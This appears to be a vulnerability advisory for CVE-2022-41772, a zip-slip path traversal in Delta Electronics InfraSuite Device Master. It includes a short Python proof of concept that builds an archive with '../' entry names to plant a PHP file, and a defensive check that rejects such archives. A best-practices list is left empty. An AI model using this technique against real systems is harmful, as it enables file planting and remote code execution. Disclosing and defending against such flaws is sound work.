Introduction:
Delta Electronics InfraSuite Device Master is popular software widely used to manage data center infrastructure. Versions 00.00.01a and prior are vulnerable to path traversal because they mishandle .ZIP archives whose entry names contain path traversal characters. Attackers can exploit this vulnerability to execute code remotely and potentially gain unauthorized access to the affected system.

Details of the vulnerability:
The CVE-2022-41772 vulnerability exists in Delta Electronics InfraSuite Device Master versions 00.00.01a and prior. These versions do not properly validate and sanitize the filenames inside .ZIP archives, which may result in path traversal. Attackers can exploit this vulnerability by crafting .ZIP files whose entry names use "../" (dot-dot-slash) sequences.

The vulnerability occurs because the software does not properly validate and sanitize the filenames within the .ZIP archive. In the affected versions, the filenames can include "../" (dot-dot-slash) sequences that result in accessing directories outside of the intended scope.

Exploit:

Here is an example of a simple exploit that demonstrates the vulnerability:

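from zipfile import ZipFile

malicious_file = 'malicious_file.php'  # local file that is added to the archive
target_directory = '../../../../../../target_directory/'

with ZipFile('exploit.zip', 'w') as zipf:
    # The second argument is the name stored in the archive, "../" prefix included
    zipf.write(malicious_file, target_directory + malicious_file)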

This Python script creates a .ZIP file containing a malicious PHP file. The target_directory variable is set to a path containing multiple "../" (dot-dot-slash) sequences. When the resulting exploit.zip file is uploaded to the affected device, the malicious file is extracted and placed in the target directory, which may lead to remote code execution.

Mitigation

Delta Electronics has acknowledged the vulnerability and recommends that users update their InfraSuite Device Master software to version 00.00.02 or later to address the issue. The updated version includes better validation and sanitization of .ZIP filenames, preventing path traversal attacks.

You can download the updated version from the official website:
Delta Electronics InfraSuite Device Master Version 00.00.02 Download
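
The kind of filename validation described above can be sketched as follows. This is an added example, not Delta Electronics' code and not part of the original advisory; the function names are hypothetical, the sample archives are constructed in memory, and treating "\" as a separator is an assumption made so the check behaves the same on any platform.

```python
import io
import posixpath
import zipfile


def entry_escapes(name: str) -> bool:
    """True if a ZIP entry name would resolve outside the extraction root."""
    # Assumption: treat "\" as a separator so Windows-style names are caught too.
    norm = name.replace("\\", "/")
    # Absolute and drive-letter paths ignore the extraction root entirely.
    if norm.startswith("/") or (len(norm) > 1 and norm[1] == ":"):
        return True
    # Collapse "a/../b", then see whether anything still climbs above the root.
    collapsed = posixpath.normpath(norm)
    return collapsed == ".." or collapsed.startswith("../")


def audit_archive(data: bytes) -> list[str]:
    """Return every entry name in the archive that fails the check."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [n for n in zf.namelist() if entry_escapes(n)]


def safe_extract(data: bytes, dest: str) -> list[str]:
    """Extract only if every entry stays inside dest; otherwise reject it all."""
    bad = audit_archive(data)
    if bad:
        raise ValueError(f"refusing archive, entries escape root: {bad}")
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        zf.extractall(dest)
        return zf.namelist()


def build_sample(names: list[str]) -> bytes:
    """Constructed sample archive; every entry holds harmless text."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for n in names:
            zf.writestr(n, "sample")
    return buf.getvalue()
```

Rejecting the whole archive, rather than skipping or rewriting the offending entries, keeps a partially extracted upload from ever reaching disk.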

In addition to updating the software, it is crucial for users to follow best practices in securing their systems, including but not limited to:

Original references

- CVE-2022-41772 | NVD
- Delta Electronics Advisory

Conclusion

The CVE-2022-41772 vulnerability in Delta Electronics InfraSuite Device Master versions 00.00.01a and prior could lead to path traversal attacks and result in remote code execution. Affected users are strongly advised to update their software to the latest version and follow best practices to ensure the security of their systems.

Timeline

Published on: 10/31/2022 20:15:00 UTC
Last modified on: 11/02/2022 14:04:00 UTC